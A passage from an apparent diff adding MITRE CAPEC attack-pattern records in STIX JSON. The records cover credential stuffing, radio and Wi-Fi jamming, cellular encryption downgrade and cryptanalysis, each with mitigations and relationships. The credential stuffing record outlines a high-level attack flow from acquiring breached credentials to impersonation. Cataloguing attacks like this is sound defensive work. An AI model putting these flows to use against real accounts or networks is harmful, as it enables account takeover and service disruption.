"capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

    2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

  2. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

    3. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

    2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4ceb80d-d66e-40ed-8041-badec381e5b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5041416c-f169-4ccd-a849-d3df74a189c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--31e79d3e-c3fa-47e2-9e66-4fec40ce3d44", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46e1f0c5-b178-4459-96f1-6522f4e3e9ab", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5bcb0cc-37a1-46f8-8b46-cd63f87de636", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3123edea-0c54-4b71-be21-4d83cea9c940", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5589acda-9084-4d60-a9f7-5bb13e6d9196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba6343af-b630-429a-b10a-f9e9ac7ff6a2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.", + "external_references": [ + { + "external_id": "CAPEC-601", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/601.html" + } + ], + "id": "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (The jamming of equipment denies the availability of functioning communications services.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-602", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--2fb09678-092a-490d-b2da-fff20a696219", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Degradation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary blocks the delivery of an important system resource causing the system to fail or stop working.", + "external_references": [ + { + "external_id": "CAPEC-603", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/603.html" + } + ], + "id": "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Blockage", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking a resource from functional operation denies its availability to authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5" + ], + "x_capec_prerequisites": [ + "This attack pattern requires knowledge of where important system resources are logically located as well as how they operate." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack – for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.", + "external_references": [ + { + "external_id": "CAPEC-604", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/604.html" + } + ], + "id": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Wi-Fi Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the Wi-fi network to authorized users.)", + "Resource Consumption (The attacker's goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Lack of anti-jam features in 802.11", + "Lack of authentication on deauthentication/disassociation packets on 802.11-based networks" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi.", + "id": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-604-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52128fa2-afdb-4097-bdd6-8f3b3095fc56", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "target_ref": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.", + "id": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-605-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--10c74aec-704c-47cf-ae7a-7f2c590c4166", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "target_ref": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).", + "external_references": [ + { + "external_id": "CAPEC-606", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/606.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Weakening of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Tracking, Network Reconnaissance)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks." + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.", + "id": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9467c544-8557-428f-9ebe-8a1fcc52a7f9", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption.", + "id": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--913cda1e-62b6-4e54-9557-3e3626768a59", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or cause the system to stop working as intended. This can cause the system components to be unavailable until the obstruction mitigated.", + "external_references": [ + { + "external_id": "CAPEC-607", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/607.html" + } + ], + "id": "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Obstruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--61546d1a-d720-4609-89ca-12039268d502" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.", + "external_references": [ + { + "external_id": "CAPEC-608", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/608.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + } + ], + "id": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Cryptanalysis of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--75de4a67-623a-4c5a-a757-9f143a48b1d9", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56a59dd2-1721-46b2-84d7-cdcd15e06ca7", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.", + "external_references": [ + { + "external_id": "CAPEC-609", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/609.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + 